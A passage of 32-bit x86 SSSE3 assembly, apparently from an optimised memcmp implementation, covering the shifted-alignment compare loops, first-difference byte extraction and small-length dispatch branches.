jge L(shr_2_gobble_next)
inc %edx
add $32, %ecx
L(shr_2_gobble_next):
test %edx, %edx
jnz L(exit)
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 2(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_3):
cmp $80, %ecx
lea -48(%ecx), %ecx
mov %edx, %eax
jae L(shr_3_gobble)
movdqa 16(%esi), %xmm1
movdqa %xmm1, %xmm2
palignr $3,(%esi), %xmm1
pcmpeqb (%edi), %xmm1
movdqa 32(%esi), %xmm3
palignr $3,%xmm2, %xmm3
pcmpeqb 16(%edi), %xmm3
pand %xmm1, %xmm3
pmovmskb %xmm3, %edx
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 3(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_3_gobble):
sub $32, %ecx
movdqa 16(%esi), %xmm0
palignr $3,(%esi), %xmm0
pcmpeqb (%edi), %xmm0
movdqa 32(%esi), %xmm3
palignr $3,16(%esi), %xmm3
pcmpeqb 16(%edi), %xmm3
L(shr_3_gobble_loop):
pand %xmm0, %xmm3
sub $32, %ecx
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
movdqa 64(%esi), %xmm3
palignr $3,48(%esi), %xmm3
sbb $0xffff, %edx
movdqa 48(%esi), %xmm0
palignr $3,32(%esi), %xmm0
pcmpeqb 32(%edi), %xmm0
lea 32(%esi), %esi
pcmpeqb 48(%edi), %xmm3
lea 32(%edi), %edi
jz L(shr_3_gobble_loop)
pand %xmm0, %xmm3
cmp $0, %ecx
jge L(shr_3_gobble_next)
inc %edx
add $32, %ecx
L(shr_3_gobble_next):
test %edx, %edx
jnz L(exit)
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 3(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_4):
cmp $80, %ecx
lea -48(%ecx), %ecx
mov %edx, %eax
jae L(shr_4_gobble)
movdqa 16(%esi), %xmm1
movdqa %xmm1, %xmm2
palignr $4,(%esi), %xmm1
pcmpeqb (%edi), %xmm1
movdqa 32(%esi), %xmm3
palignr $4,%xmm2, %xmm3
pcmpeqb 16(%edi), %xmm3
pand %xmm1, %xmm3
pmovmskb %xmm3, %edx
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 4(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_4_gobble):
sub $32, %ecx
movdqa 16(%esi), %xmm0
palignr $4,(%esi), %xmm0
pcmpeqb (%edi), %xmm0
movdqa 32(%esi), %xmm3
palignr $4,16(%esi), %xmm3
pcmpeqb 16(%edi), %xmm3
L(shr_4_gobble_loop):
pand %xmm0, %xmm3
sub $32, %ecx
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
movdqa 64(%esi), %xmm3
palignr $4,48(%esi), %xmm3
sbb $0xffff, %edx
movdqa 48(%esi), %xmm0
palignr $4,32(%esi), %xmm0
pcmpeqb 32(%edi), %xmm0
lea 32(%esi), %esi
pcmpeqb 48(%edi), %xmm3
lea 32(%edi), %edi
jz L(shr_4_gobble_loop)
pand %xmm0, %xmm3
cmp $0, %ecx
jge L(shr_4_gobble_next)
inc %edx
add $32, %ecx
L(shr_4_gobble_next):
test %edx, %edx
jnz L(exit)
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 4(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_5):
cmp $80, %ecx
lea -48(%ecx), %ecx
mov %edx, %eax
jae L(shr_5_gobble)
movdqa 16(%esi), %xmm1
movdqa %xmm1, %xmm2
palignr $5,(%esi), %xmm1
pcmpeqb (%edi), %xmm1
movdqa 32(%esi), %xmm3
palignr $5,%xmm2, %xmm3
pcmpeqb 16(%edi), %xmm3
pand %xmm1, %xmm3
pmovmskb %xmm3, %edx
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 5(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_5_gobble):
sub $32, %ecx
movdqa 16(%esi), %xmm0
palignr $5,(%esi), %xmm0
pcmpeqb (%edi), %xmm0
movdqa 32(%esi), %xmm3
palignr $5,16(%esi), %xmm3
pcmpeqb 16(%edi), %xmm3
L(shr_5_gobble_loop):
pand %xmm0, %xmm3
sub $32, %ecx
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
movdqa 64(%esi), %xmm3
palignr $5,48(%esi), %xmm3
sbb $0xffff, %edx
movdqa 48(%esi), %xmm0
palignr $5,32(%esi), %xmm0
pcmpeqb 32(%edi), %xmm0
lea 32(%esi), %esi
pcmpeqb 48(%edi), %xmm3
lea 32(%edi), %edi
jz L(shr_5_gobble_loop)
pand %xmm0, %xmm3
cmp $0, %ecx
jge L(shr_5_gobble_next)
inc %edx
add $32, %ecx
L(shr_5_gobble_next):
test %edx, %edx
jnz L(exit)
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 5(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_6):
cmp $80, %ecx
lea -48(%ecx), %ecx
mov %edx, %eax
jae L(shr_6_gobble)
movdqa 16(%esi), %xmm1
movdqa %xmm1, %xmm2
palignr $6,(%esi), %xmm1
pcmpeqb (%edi), %xmm1
movdqa 32(%esi), %xmm3
palignr $6,%xmm2, %xmm3
pcmpeqb 16(%edi), %xmm3
pand %xmm1, %xmm3
pmovmskb %xmm3, %edx
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 6(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_6_gobble):
sub $32, %ecx
movdqa 16(%esi), %xmm0
palignr $6,(%esi), %xmm0
pcmpeqb (%edi), %xmm0
movdqa 32(%esi), %xmm3
palignr $6,16(%esi), %xmm3
pcmpeqb 16(%edi), %xmm3
L(shr_6_gobble_loop):
pand %xmm0, %xmm3
sub $32, %ecx
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
movdqa 64(%esi), %xmm3
palignr $6,48(%esi), %xmm3
sbb $0xffff, %edx
movdqa 48(%esi), %xmm0
palignr $6,32(%esi), %xmm0
pcmpeqb 32(%edi), %xmm0
lea 32(%esi), %esi
pcmpeqb 48(%edi), %xmm3
lea 32(%edi), %edi
jz L(shr_6_gobble_loop)
pand %xmm0, %xmm3
cmp $0, %ecx
jge L(shr_6_gobble_next)
inc %edx
add $32, %ecx
L(shr_6_gobble_next):
test %edx, %edx
jnz L(exit)
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 6(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_7):
cmp $80, %ecx
lea -48(%ecx), %ecx
mov %edx, %eax
jae L(shr_7_gobble)
movdqa 16(%esi), %xmm1
movdqa %xmm1, %xmm2
palignr $7,(%esi), %xmm1
pcmpeqb (%edi), %xmm1
movdqa 32(%esi), %xmm3
palignr $7,%xmm2, %xmm3
pcmpeqb 16(%edi), %xmm3
pand %xmm1, %xmm3
pmovmskb %xmm3, %edx
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 7(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_7_gobble):
sub $32, %ecx
movdqa 16(%esi), %xmm0
palignr $7,(%esi), %xmm0
pcmpeqb (%edi), %xmm0
movdqa 32(%esi), %xmm3
palignr $7,16(%esi), %xmm3
pcmpeqb 16(%edi), %xmm3
L(shr_7_gobble_loop):
pand %xmm0, %xmm3
sub $32, %ecx
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
movdqa 64(%esi), %xmm3
palignr $7,48(%esi), %xmm3
sbb $0xffff, %edx
movdqa 48(%esi), %xmm0
palignr $7,32(%esi), %xmm0
pcmpeqb 32(%edi), %xmm0
lea 32(%esi), %esi
pcmpeqb 48(%edi), %xmm3
lea 32(%edi), %edi
jz L(shr_7_gobble_loop)
pand %xmm0, %xmm3
cmp $0, %ecx
jge L(shr_7_gobble_next)
inc %edx
add $32, %ecx
L(shr_7_gobble_next):
test %edx, %edx
jnz L(exit)
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 7(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_8):
cmp $80, %ecx
lea -48(%ecx), %ecx
mov %edx, %eax
jae L(shr_8_gobble)
movdqa 16(%esi), %xmm1
movdqa %xmm1, %xmm2
palignr $8,(%esi), %xmm1
pcmpeqb (%edi), %xmm1
movdqa 32(%esi), %xmm3
palignr $8,%xmm2, %xmm3
pcmpeqb 16(%edi), %xmm3
pand %xmm1, %xmm3
pmovmskb %xmm3, %edx
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 8(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_8_gobble):
sub $32, %ecx
movdqa 16(%esi), %xmm0
palignr $8,(%esi), %xmm0
pcmpeqb (%edi), %xmm0
movdqa 32(%esi), %xmm3
palignr $8,16(%esi), %xmm3
pcmpeqb 16(%edi), %xmm3
L(shr_8_gobble_loop):
pand %xmm0, %xmm3
sub $32, %ecx
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
movdqa 64(%esi), %xmm3
palignr $8,48(%esi), %xmm3
sbb $0xffff, %edx
movdqa 48(%esi), %xmm0
palignr $8,32(%esi), %xmm0
pcmpeqb 32(%edi), %xmm0
lea 32(%esi), %esi
pcmpeqb 48(%edi), %xmm3
lea 32(%edi), %edi
jz L(shr_8_gobble_loop)
pand %xmm0, %xmm3
cmp $0, %ecx
jge L(shr_8_gobble_next)
inc %edx
add $32, %ecx
L(shr_8_gobble_next):
test %edx, %edx
jnz L(exit)
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 8(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_9):
cmp $80, %ecx
lea -48(%ecx), %ecx
mov %edx, %eax
jae L(shr_9_gobble)
movdqa 16(%esi), %xmm1
movdqa %xmm1, %xmm2
palignr $9,(%esi), %xmm1
pcmpeqb (%edi), %xmm1
movdqa 32(%esi), %xmm3
palignr $9,%xmm2, %xmm3
pcmpeqb 16(%edi), %xmm3
pand %xmm1, %xmm3
pmovmskb %xmm3, %edx
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 9(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_9_gobble):
sub $32, %ecx
movdqa 16(%esi), %xmm0
palignr $9,(%esi), %xmm0
pcmpeqb (%edi), %xmm0
movdqa 32(%esi), %xmm3
palignr $9,16(%esi), %xmm3
pcmpeqb 16(%edi), %xmm3
L(shr_9_gobble_loop):
pand %xmm0, %xmm3
sub $32, %ecx
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
movdqa 64(%esi), %xmm3
palignr $9,48(%esi), %xmm3
sbb $0xffff, %edx
movdqa 48(%esi), %xmm0
palignr $9,32(%esi), %xmm0
pcmpeqb 32(%edi), %xmm0
lea 32(%esi), %esi
pcmpeqb 48(%edi), %xmm3
lea 32(%edi), %edi
jz L(shr_9_gobble_loop)
pand %xmm0, %xmm3
cmp $0, %ecx
jge L(shr_9_gobble_next)
inc %edx
add $32, %ecx
L(shr_9_gobble_next):
test %edx, %edx
jnz L(exit)
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 9(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_10):
cmp $80, %ecx
lea -48(%ecx), %ecx
mov %edx, %eax
jae L(shr_10_gobble)
movdqa 16(%esi), %xmm1
movdqa %xmm1, %xmm2
palignr $10, (%esi), %xmm1
pcmpeqb (%edi), %xmm1
movdqa 32(%esi), %xmm3
palignr $10,%xmm2, %xmm3
pcmpeqb 16(%edi), %xmm3
pand %xmm1, %xmm3
pmovmskb %xmm3, %edx
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 10(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_10_gobble):
sub $32, %ecx
movdqa 16(%esi), %xmm0
palignr $10, (%esi), %xmm0
pcmpeqb (%edi), %xmm0
movdqa 32(%esi), %xmm3
palignr $10, 16(%esi), %xmm3
pcmpeqb 16(%edi), %xmm3
L(shr_10_gobble_loop):
pand %xmm0, %xmm3
sub $32, %ecx
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
movdqa 64(%esi), %xmm3
palignr $10,48(%esi), %xmm3
sbb $0xffff, %edx
movdqa 48(%esi), %xmm0
palignr $10,32(%esi), %xmm0
pcmpeqb 32(%edi), %xmm0
lea 32(%esi), %esi
pcmpeqb 48(%edi), %xmm3
lea 32(%edi), %edi
jz L(shr_10_gobble_loop)
pand %xmm0, %xmm3
cmp $0, %ecx
jge L(shr_10_gobble_next)
inc %edx
add $32, %ecx
L(shr_10_gobble_next):
test %edx, %edx
jnz L(exit)
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 10(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_11):
cmp $80, %ecx
lea -48(%ecx), %ecx
mov %edx, %eax
jae L(shr_11_gobble)
movdqa 16(%esi), %xmm1
movdqa %xmm1, %xmm2
palignr $11, (%esi), %xmm1
pcmpeqb (%edi), %xmm1
movdqa 32(%esi), %xmm3
palignr $11, %xmm2, %xmm3
pcmpeqb 16(%edi), %xmm3
pand %xmm1, %xmm3
pmovmskb %xmm3, %edx
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 11(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_11_gobble):
sub $32, %ecx
movdqa 16(%esi), %xmm0
palignr $11, (%esi), %xmm0
pcmpeqb (%edi), %xmm0
movdqa 32(%esi), %xmm3
palignr $11, 16(%esi), %xmm3
pcmpeqb 16(%edi), %xmm3
L(shr_11_gobble_loop):
pand %xmm0, %xmm3
sub $32, %ecx
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
movdqa 64(%esi), %xmm3
palignr $11,48(%esi), %xmm3
sbb $0xffff, %edx
movdqa 48(%esi), %xmm0
palignr $11,32(%esi), %xmm0
pcmpeqb 32(%edi), %xmm0
lea 32(%esi), %esi
pcmpeqb 48(%edi), %xmm3
lea 32(%edi), %edi
jz L(shr_11_gobble_loop)
pand %xmm0, %xmm3
cmp $0, %ecx
jge L(shr_11_gobble_next)
inc %edx
add $32, %ecx
L(shr_11_gobble_next):
test %edx, %edx
jnz L(exit)
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 11(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_12):
cmp $80, %ecx
lea -48(%ecx), %ecx
mov %edx, %eax
jae L(shr_12_gobble)
movdqa 16(%esi), %xmm1
movdqa %xmm1, %xmm2
palignr $12, (%esi), %xmm1
pcmpeqb (%edi), %xmm1
movdqa 32(%esi), %xmm3
palignr $12, %xmm2, %xmm3
pcmpeqb 16(%edi), %xmm3
pand %xmm1, %xmm3
pmovmskb %xmm3, %edx
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 12(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_12_gobble):
sub $32, %ecx
movdqa 16(%esi), %xmm0
palignr $12, (%esi), %xmm0
pcmpeqb (%edi), %xmm0
movdqa 32(%esi), %xmm3
palignr $12, 16(%esi), %xmm3
pcmpeqb 16(%edi), %xmm3
L(shr_12_gobble_loop):
pand %xmm0, %xmm3
sub $32, %ecx
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
movdqa 64(%esi), %xmm3
palignr $12,48(%esi), %xmm3
sbb $0xffff, %edx
movdqa 48(%esi), %xmm0
palignr $12,32(%esi), %xmm0
pcmpeqb 32(%edi), %xmm0
lea 32(%esi), %esi
pcmpeqb 48(%edi), %xmm3
lea 32(%edi), %edi
jz L(shr_12_gobble_loop)
pand %xmm0, %xmm3
cmp $0, %ecx
jge L(shr_12_gobble_next)
inc %edx
add $32, %ecx
L(shr_12_gobble_next):
test %edx, %edx
jnz L(exit)
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 12(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_13):
cmp $80, %ecx
lea -48(%ecx), %ecx
mov %edx, %eax
jae L(shr_13_gobble)
movdqa 16(%esi), %xmm1
movdqa %xmm1, %xmm2
palignr $13, (%esi), %xmm1
pcmpeqb (%edi), %xmm1
movdqa 32(%esi), %xmm3
palignr $13, %xmm2, %xmm3
pcmpeqb 16(%edi), %xmm3
pand %xmm1, %xmm3
pmovmskb %xmm3, %edx
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 13(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_13_gobble):
sub $32, %ecx
movdqa 16(%esi), %xmm0
palignr $13, (%esi), %xmm0
pcmpeqb (%edi), %xmm0
movdqa 32(%esi), %xmm3
palignr $13, 16(%esi), %xmm3
pcmpeqb 16(%edi), %xmm3
L(shr_13_gobble_loop):
pand %xmm0, %xmm3
sub $32, %ecx
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
movdqa 64(%esi), %xmm3
palignr $13,48(%esi), %xmm3
sbb $0xffff, %edx
movdqa 48(%esi), %xmm0
palignr $13,32(%esi), %xmm0
pcmpeqb 32(%edi), %xmm0
lea 32(%esi), %esi
pcmpeqb 48(%edi), %xmm3
lea 32(%edi), %edi
jz L(shr_13_gobble_loop)
pand %xmm0, %xmm3
cmp $0, %ecx
jge L(shr_13_gobble_next)
inc %edx
add $32, %ecx
L(shr_13_gobble_next):
test %edx, %edx
jnz L(exit)
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 13(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_14):
cmp $80, %ecx
lea -48(%ecx), %ecx
mov %edx, %eax
jae L(shr_14_gobble)
movdqa 16(%esi), %xmm1
movdqa %xmm1, %xmm2
palignr $14, (%esi), %xmm1
pcmpeqb (%edi), %xmm1
movdqa 32(%esi), %xmm3
palignr $14, %xmm2, %xmm3
pcmpeqb 16(%edi), %xmm3
pand %xmm1, %xmm3
pmovmskb %xmm3, %edx
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 14(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_14_gobble):
sub $32, %ecx
movdqa 16(%esi), %xmm0
palignr $14, (%esi), %xmm0
pcmpeqb (%edi), %xmm0
movdqa 32(%esi), %xmm3
palignr $14, 16(%esi), %xmm3
pcmpeqb 16(%edi), %xmm3
L(shr_14_gobble_loop):
pand %xmm0, %xmm3
sub $32, %ecx
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
movdqa 64(%esi), %xmm3
palignr $14,48(%esi), %xmm3
sbb $0xffff, %edx
movdqa 48(%esi), %xmm0
palignr $14,32(%esi), %xmm0
pcmpeqb 32(%edi), %xmm0
lea 32(%esi), %esi
pcmpeqb 48(%edi), %xmm3
lea 32(%edi), %edi
jz L(shr_14_gobble_loop)
pand %xmm0, %xmm3
cmp $0, %ecx
jge L(shr_14_gobble_next)
inc %edx
add $32, %ecx
L(shr_14_gobble_next):
test %edx, %edx
jnz L(exit)
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 14(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_15):
cmp $80, %ecx
lea -48(%ecx), %ecx
mov %edx, %eax
jae L(shr_15_gobble)
movdqa 16(%esi), %xmm1
movdqa %xmm1, %xmm2
palignr $15, (%esi), %xmm1
pcmpeqb (%edi), %xmm1
movdqa 32(%esi), %xmm3
palignr $15, %xmm2, %xmm3
pcmpeqb 16(%edi), %xmm3
pand %xmm1, %xmm3
pmovmskb %xmm3, %edx
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 15(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_15_gobble):
sub $32, %ecx
movdqa 16(%esi), %xmm0
palignr $15, (%esi), %xmm0
pcmpeqb (%edi), %xmm0
movdqa 32(%esi), %xmm3
palignr $15, 16(%esi), %xmm3
pcmpeqb 16(%edi), %xmm3
L(shr_15_gobble_loop):
pand %xmm0, %xmm3
sub $32, %ecx
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
movdqa 64(%esi), %xmm3
palignr $15,48(%esi), %xmm3
sbb $0xffff, %edx
movdqa 48(%esi), %xmm0
palignr $15,32(%esi), %xmm0
pcmpeqb 32(%edi), %xmm0
lea 32(%esi), %esi
pcmpeqb 48(%edi), %xmm3
lea 32(%edi), %edi
jz L(shr_15_gobble_loop)
pand %xmm0, %xmm3
cmp $0, %ecx
jge L(shr_15_gobble_next)
inc %edx
add $32, %ecx
L(shr_15_gobble_next):
test %edx, %edx
jnz L(exit)
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 15(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(exit):
pmovmskb %xmm1, %ebx
sub $0xffff, %ebx
jz L(first16bytes)
lea -16(%esi), %esi
lea -16(%edi), %edi
mov %ebx, %edx
L(first16bytes):
add %eax, %esi
L(less16bytes):
test %dl, %dl
jz L(next_24_bytes)
test $0x01, %dl
jnz L(Byte16)
test $0x02, %dl
jnz L(Byte17)
test $0x04, %dl
jnz L(Byte18)
test $0x08, %dl
jnz L(Byte19)
test $0x10, %dl
jnz L(Byte20)
test $0x20, %dl
jnz L(Byte21)
test $0x40, %dl
jnz L(Byte22)
L(Byte23):
movzbl -9(%edi), %eax
movzbl -9(%esi), %edx
sub %edx, %eax
RETURN
ALIGN (4)
L(Byte16):
movzbl -16(%edi), %eax
movzbl -16(%esi), %edx
sub %edx, %eax
RETURN
ALIGN (4)
L(Byte17):
movzbl -15(%edi), %eax
movzbl -15(%esi), %edx
sub %edx, %eax
RETURN
ALIGN (4)
L(Byte18):
movzbl -14(%edi), %eax
movzbl -14(%esi), %edx
sub %edx, %eax
RETURN
ALIGN (4)
L(Byte19):
movzbl -13(%edi), %eax
movzbl -13(%esi), %edx
sub %edx, %eax
RETURN
ALIGN (4)
L(Byte20):
movzbl -12(%edi), %eax
movzbl -12(%esi), %edx
sub %edx, %eax
RETURN
ALIGN (4)
L(Byte21):
movzbl -11(%edi), %eax
movzbl -11(%esi), %edx
sub %edx, %eax
RETURN
ALIGN (4)
L(Byte22):
movzbl -10(%edi), %eax
movzbl -10(%esi), %edx
sub %edx, %eax
RETURN
ALIGN (4)
L(next_24_bytes):
lea 8(%edi), %edi
lea 8(%esi), %esi
test $0x01, %dh
jnz L(Byte16)
test $0x02, %dh
jnz L(Byte17)
test $0x04, %dh
jnz L(Byte18)
test $0x08, %dh
jnz L(Byte19)
test $0x10, %dh
jnz L(Byte20)
test $0x20, %dh
jnz L(Byte21)
test $0x40, %dh
jnz L(Byte22)
ALIGN (4)
L(Byte31):
movzbl -9(%edi), %eax
movzbl -9(%esi), %edx
sub %edx, %eax
RETURN_END
CFI_PUSH (%ebx)
ALIGN (4)
L(more8bytes):
cmp $16, %ecx
jae L(more16bytes)
cmp $8, %ecx
je L(8bytes)
cmp $9, %ecx
je L(9bytes)
cmp $10, %ecx
je L(10bytes)
cmp $11, %ecx
je L(11bytes)
cmp $12, %ecx
je L(12bytes)
cmp $13, %ecx
je L(13bytes)
cmp $14, %ecx
je L(14bytes)
jmp L(15bytes)
ALIGN (4)
L(more16bytes):
cmp $24, %ecx
jae L(more24bytes)
cmp $16, %ecx
je L(16bytes)
cmp $17, %ecx
je L(17bytes)
cmp $18, %ecx
je L(18bytes)
cmp $19, %ecx
je L(19bytes)
cmp $20, %ecx
je L(20bytes)
cmp $21, %ecx
je L(21bytes)
cmp $22, %ecx
je L(22bytes)
jmp L(23bytes)
ALIGN (4)
L(more24bytes):
cmp $32, %ecx
jae L(more32bytes)
cmp $24, %ecx
je L(24bytes)
cmp $25, %ecx
je L(25bytes)
cmp $26, %ecx
je L(26bytes)
cmp $27, %ecx
je L(27bytes)
cmp $28, %ecx
je L(28bytes)
cmp $29, %ecx
je L(29bytes)
cmp $30, %ecx
je L(30bytes)
jmp L(31bytes)
ALIGN (4)
L(more32bytes):
cmp $40, %ecx
jae L(more40bytes)
cmp $32, %ecx
je L(32bytes)
cmp $33, %ecx
je L(33bytes)
cmp $34, %ecx
je L(34bytes)
cmp $35, %ecx
je L(35bytes)
cmp $36, %ecx
je L(36bytes)
cmp $37, %ecx
je L(37bytes)
cmp $38, %ecx
